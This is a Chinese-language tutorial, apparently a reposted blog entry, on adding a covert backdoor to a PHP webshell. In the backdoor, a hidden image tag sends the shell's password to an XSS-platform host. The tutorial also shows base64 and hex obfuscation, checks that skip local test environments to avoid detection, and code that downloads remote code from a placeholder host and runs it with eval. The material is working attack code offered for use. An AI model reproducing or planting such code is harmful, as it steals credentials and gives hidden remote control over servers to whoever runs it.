给你的PHP大马添加后门(黑吃黑)

Posted s9mf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了给你的PHP大马添加后门(黑吃黑)相关的知识,希望对你有一定的参考价值。

Part 1 引子

  说什么好呢,发个图就当个引子好了。

 

Part 2 XSS平台

  创建项目

 

 

  选择类型

 

 

  xss代码

 

 

  小实验,刷新代码

 

 

  XSS平台上

 

Part 3 后门

 我们写这样一个脚本

<?php
$password = \'admin\';  // 假设这个大马密码
                              // 这个是你自己的xss代码 
echo \'<img width=0height=0 src="http://xss.cn/xss.php?do=api&id=c7rL&location=\'.$password.\'"/>\';

  

  浏览器,运行脚本

 

 

  XSS平台上

 

   加密XSS代码

 

 

  最终脚本

<?php
$password
= \'hacksb\'; // 假设这个大马密码 $url = \'base64加密代码\'; $hm = base64_decode($url); echo $hm.$password.\' "/>\';

  

  测试下,运行脚本。

<?php
$password = \'hacksb\'; 
$url = \'PGltZB3aWR0aD0waGVpZ2h0PTAgc3JjPJodHRwOi8veHzMS5jbi94c3MucGhwP2RvPWFwaSZpZD1jNJmxvY2F0a9uPQ==\';
$hm = base64_decode($url);
echo $hm.$password.\' "/>\';

 

  

  

  XSS平台上

 

 

Part 3 利用

  找个大马。

   

  

  插入后门代码。总之,尽可能不被别人轻而易举识破。还有变量名不要和大马本身冲突。

  

  

  运行大马。

  

  XSS平台上。嘿嘿嘿

 

  

 Part 4 缺陷

  这后门还不够完善,例如抓包,F12后门就漏出来了,有待完善。例如后门代码只运行一次,本地测试环境不执行后门代码。

 

Part 5 改进

  我们可以加一个判断是否是本地测试环境

$domain = $_SERVER [\'HTTP_HOST\'];
if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
     $indexhtmls="200 OK";
}else {
    // 执行后门代码
}

  也可以远程来。

$domain = $_SERVER [\'HTTP_HOST\'];
if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
     $indexhtmls="200 OK";
}else {
    $a = file_get_contents(\'http://www.xx.com/1.txt\');
    eval($a);
}

  

  大概就是这个样子

$dadada = $_SERVER [\'HTTP_HOST\'];
if (strpos($dadada, "0.0") !== false || strpos($dadada, "192.168.") !== false || strpos($dadada, "localhost") !== false) {
     $s9mf="200 OK";
}else {
    $s9 = "687474703A2F2F7777772E78782E636F6D2F626C61636B646F6F722E747874";
                http://www.xxx.com/blackdoor.txt   hex编码
    $m="s9";
    $f = file_get_contents(PACK(\'H*\',$$m));
    eval($f);
}



blackdoor.txt 内容如下:


@set_time_limit(0);
echo \'<img width=0height=0 src="http://xsssb.cn/xss.php?do=api&id=rL&location=\'.$password.\'"/>\';

 

  Part 6 瞎扯

  

 

  

参考: https://bbs.ichunqiu.com/thread-18486-1-1.html

 

以上是关于给你的PHP大马添加后门(黑吃黑)的主要内容,如果未能解决你的问题,请参考以下文章

“黑吃黑”webshell箱子

php免杀木马的技巧

[转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没

各类黑客大马默认密码后门

PHP漏洞利用工具开发,PHPcms二次开发,PHPcms,DEDEcms简单代码审计

php.webshell.eval有啥用?